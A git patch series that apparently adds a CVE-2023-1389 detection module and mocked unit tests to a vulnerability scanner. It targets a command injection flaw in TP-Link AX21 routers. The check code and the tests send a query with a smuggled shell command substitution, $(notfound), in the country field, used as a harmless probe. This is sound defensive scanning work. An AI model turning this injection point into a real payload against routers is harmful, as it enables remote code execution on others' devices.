From 2651faa774b84f5c6b74033d3c5f9a726f1059ff Mon Sep 17 00:00:00 2001 From: Alaeddine Mesbahi Date: Mon, 27 Nov 2023 11:52:11 +0100 Subject: [PATCH 1/5] Detection for CVE-2023-1389. --- agent/definitions.py | 4 ++ agent/exploits/cve_2023_1389.py | 92 ++++++++++++++++++++++++++++ tests/exploits/cve_2023_1389_test.py | 59 ++++++++++++++++++ 3 files changed, 155 insertions(+) create mode 100644 agent/exploits/cve_2023_1389.py create mode 100644 tests/exploits/cve_2023_1389_test.py diff --git a/agent/definitions.py b/agent/definitions.py index 066d44f7..9e4ce8ef 100644 --- a/agent/definitions.py +++ b/agent/definitions.py @@ -13,6 +13,10 @@ class Target: port: int path: str = "/" + @property + def url(self) -> str: + return f"{self.scheme}://{self.host}:{self.port}{self.path}" + @dataclasses.dataclass class Vulnerability: diff --git a/agent/exploits/cve_2023_1389.py b/agent/exploits/cve_2023_1389.py new file mode 100644 index 00000000..b2edce4e --- /dev/null +++ b/agent/exploits/cve_2023_1389.py @@ -0,0 +1,92 @@ +"""Agent Asteroid implementation for CVE-2023-1389""" + +import requests +from ostorlab.agent.kb import kb +from ostorlab.agent.mixins import agent_report_vulnerability_mixin +from requests import exceptions as requests_exceptions + +from agent import definitions +from agent import exploits_registry + +VULNERABILITY_TITLE = "Remote Code Execution in TP-Link AX21" +VULNERABILITY_REFERENCE = "CVE-2023-1389" +VULNERABILITY_DESCRIPTION = ( + "TP-Link AX21 suffers from Remote Code Execution (RCE) vulnerability. The vulnerability" + " has been added to the Mirai botnet Arsenal and is actively being targeted by in the" + " wild." +) + + +DEFAULT_TIMEOUT = 90 + + +@exploits_registry.register +class CVE20231389Exploit(definitions.Exploit): + """CVE-2023-1389: Remote Code Execution in TP-Link AX21.""" + + def accept(self, target: definitions.Target) -> bool: + target_uri = f"{target.scheme}://{target.host}:{target.port}/cgi-bin/luci/" + try: + response = requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT) + if response.status_code == 200: + return True + else: + return False + except requests_exceptions.RequestException: + return False + + def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: + target_uri = f"{target.scheme}://{target.host}:{target.port}" + try: + response = requests.get( + target_uri + + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(notfound)", + verify=False, + timeout=DEFAULT_TIMEOUT, + ) + # TODO(OS-6117): Approximate check that needs a live instance to validate the issue. + if response.status_code == 500: + vulnerability = self._generate_vulnerability_object( + target_uri, response.text + ) + return [vulnerability] + + except requests_exceptions.RequestException: + return [] + + return [] + + def _generate_vulnerability_object( + self, target_uri: str, response_body: str + ) -> definitions.Vulnerability: + entry = kb.Entry( + title=VULNERABILITY_TITLE, + risk_rating="CRITICAL", + short_description=VULNERABILITY_DESCRIPTION, + description=VULNERABILITY_DESCRIPTION, + references={ + "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}", + "TP-Link Advisory": "https://www.tp-link.com/us/support/faq/3643/", + "Exploit Write-Up": "https://voyag3r-security.medium.com/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94", + }, + recommendation=( + "- Make sure to install the latest security patches from software vendor \n" + "- Update to the latest software version" + ), + security_issue=True, + privacy_issue=False, + has_public_exploit=True, + targeted_by_malware=True, + targeted_by_ransomware=True, + targeted_by_nation_state=True, + ) + technical_detail = ( + f"{target_uri} is vulnerable to {VULNERABILITY_REFERENCE}," + f" {VULNERABILITY_TITLE}." + ) + vulnerability = definitions.Vulnerability( + entry=entry, + technical_detail=technical_detail, + risk_rating=agent_report_vulnerability_mixin.RiskRating.CRITICAL, + ) + return vulnerability diff --git a/tests/exploits/cve_2023_1389_test.py b/tests/exploits/cve_2023_1389_test.py new file mode 100644 index 00000000..b1f41828 --- /dev/null +++ b/tests/exploits/cve_2023_1389_test.py @@ -0,0 +1,59 @@ +"""Unit tests for Agent Asteriod exploits""" + +import requests_mock as req_mock + + +from agent import definitions +from agent.exploits import cve_2023_1389 + + +def testCVE20231389_whenVulnerable_reportFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + target = definitions.Target("https", "109.239.246.106", 10443) + requests_mock.get( + target.url + "cgi-bin/luci/", + status_code=200, + ) + requests_mock.get( + target.url + + "cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(notfound)", + status_code=500, + ) + + exploit_instance = cve_2023_1389.CVE20231389Exploit() + accept = exploit_instance.accept(target) + vulnerabilities = exploit_instance.check(target) + + assert accept is True + assert len(vulnerabilities) > 0 + vulnerability = vulnerabilities[0] + + assert vulnerability.entry.title == "Remote Code Execution in TP-Link AX21" + assert ( + vulnerability.technical_detail + == "https://109.239.246.106:10443 is vulnerable to CVE-2023-1389, Remote Code Execution in TP-Link AX21." + ) + assert vulnerability.entry.risk_rating == "CRITICAL" + + +def testCVE20231389_whenNotVulnerable_reportNoFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + target = definitions.Target("https", "109.239.246.106", 10443) + requests_mock.get( + target.url + "cgi-bin/luci/", + status_code=404, + ) + requests_mock.get( + target.url + + "cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(notfound)", + status_code=404, + ) + + exploit_instance = cve_2023_1389.CVE20231389Exploit() + accept = exploit_instance.accept(target) + vulnerabilities = exploit_instance.check(target) + + assert accept is False + assert len(vulnerabilities) == 0 From 36a90f867ace68f5014896828670b510bc5e738d Mon Sep 17 00:00:00 2001 From: Alaeddine Mesbahi Date: Mon, 27 Nov 2023 11:58:32 +0100 Subject: [PATCH 2/5] Fix linting. --- agent/exploits/cve_2023_1389.py | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/agent/exploits/cve_2023_1389.py b/agent/exploits/cve_2023_1389.py index b2edce4e..a7016ea7 100644 --- a/agent/exploits/cve_2023_1389.py +++ b/agent/exploits/cve_2023_1389.py @@ -28,10 +28,7 @@ def accept(self, target: definitions.Target) -> bool: target_uri = f"{target.scheme}://{target.host}:{target.port}/cgi-bin/luci/" try: response = requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT) - if response.status_code == 200: - return True - else: - return False + return response.status_code == 200 except requests_exceptions.RequestException: return False @@ -46,9 +43,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: ) # TODO(OS-6117): Approximate check that needs a live instance to validate the issue. if response.status_code == 500: - vulnerability = self._generate_vulnerability_object( - target_uri, response.text - ) + vulnerability = self._generate_vulnerability_object(target_uri) return [vulnerability] except requests_exceptions.RequestException: @@ -57,7 +52,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: return [] def _generate_vulnerability_object( - self, target_uri: str, response_body: str + self, target_uri: str ) -> definitions.Vulnerability: entry = kb.Entry( title=VULNERABILITY_TITLE, @@ -67,7 +62,8 @@ def _generate_vulnerability_object( references={ "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}", "TP-Link Advisory": "https://www.tp-link.com/us/support/faq/3643/", - "Exploit Write-Up": "https://voyag3r-security.medium.com/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94", + "Exploit Write-Up": "https://voyag3r-security.medium.com/exploring-cve-2023-1389" + "-rce-in-tp-link-archer-ax21-d7a60f259e94", }, recommendation=( "- Make sure to install the latest security patches from software vendor \n" From de01e55457e826186939b6833742c7639f451b0f Mon Sep 17 00:00:00 2001 From: Alaeddine Mesbahi Date: Mon, 27 Nov 2023 13:42:06 +0100 Subject: [PATCH 3/5] Update tests/exploits/cve_2023_1389_test.py Co-authored-by: PiranhaSa --- tests/exploits/cve_2023_1389_test.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/exploits/cve_2023_1389_test.py b/tests/exploits/cve_2023_1389_test.py index b1f41828..3660e969 100644 --- a/tests/exploits/cve_2023_1389_test.py +++ b/tests/exploits/cve_2023_1389_test.py @@ -1,4 +1,4 @@ -"""Unit tests for Agent Asteriod exploits""" +"""Unit tests for Agent Asteriod: CVE-2023-1389""" import requests_mock as req_mock From f0137f55ad758edc226c8b0ad06ef3208716d3a6 Mon Sep 17 00:00:00 2001 From: Alaeddine Mesbahi Date: Mon, 27 Nov 2023 13:54:15 +0100 Subject: [PATCH 4/5] Fix comment. --- tests/exploits/cve_2023_1389_test.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tests/exploits/cve_2023_1389_test.py b/tests/exploits/cve_2023_1389_test.py index b1f41828..3252fa56 100644 --- a/tests/exploits/cve_2023_1389_test.py +++ b/tests/exploits/cve_2023_1389_test.py @@ -10,6 +10,7 @@ def testCVE20231389_whenVulnerable_reportFinding( requests_mock: req_mock.mocker.Mocker, ) -> None: + """Test exploit report finding when 500 error is triggered.""" target = definitions.Target("https", "109.239.246.106", 10443) requests_mock.get( target.url + "cgi-bin/luci/", @@ -40,6 +41,7 @@ def testCVE20231389_whenVulnerable_reportFinding( def testCVE20231389_whenNotVulnerable_reportNoFinding( requests_mock: req_mock.mocker.Mocker, ) -> None: + """Test exploit don't report finding on 404 pages.""" target = definitions.Target("https", "109.239.246.106", 10443) requests_mock.get( target.url + "cgi-bin/luci/", From 29ab95b8d02d12b842e118cf346ed5e9dc2157e2 Mon Sep 17 00:00:00 2001 From: Alaeddine Mesbahi Date: Mon, 27 Nov 2023 19:10:24 +0100 Subject: [PATCH 5/5] Update agent/exploits/cve_2023_1389.py Co-authored-by: Mohamed Benchikh <129080649+BlueSquare1@users.noreply.github.com> --- agent/exploits/cve_2023_1389.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/agent/exploits/cve_2023_1389.py b/agent/exploits/cve_2023_1389.py index a7016ea7..60926720 100644 --- a/agent/exploits/cve_2023_1389.py +++ b/agent/exploits/cve_2023_1389.py @@ -12,8 +12,8 @@ VULNERABILITY_REFERENCE = "CVE-2023-1389" VULNERABILITY_DESCRIPTION = ( "TP-Link AX21 suffers from Remote Code Execution (RCE) vulnerability. The vulnerability" - " has been added to the Mirai botnet Arsenal and is actively being targeted by in the" - " wild." + " has been added to the Mirai botnet Arsenal and is actively being targeted by threat actors" + " in the wild." )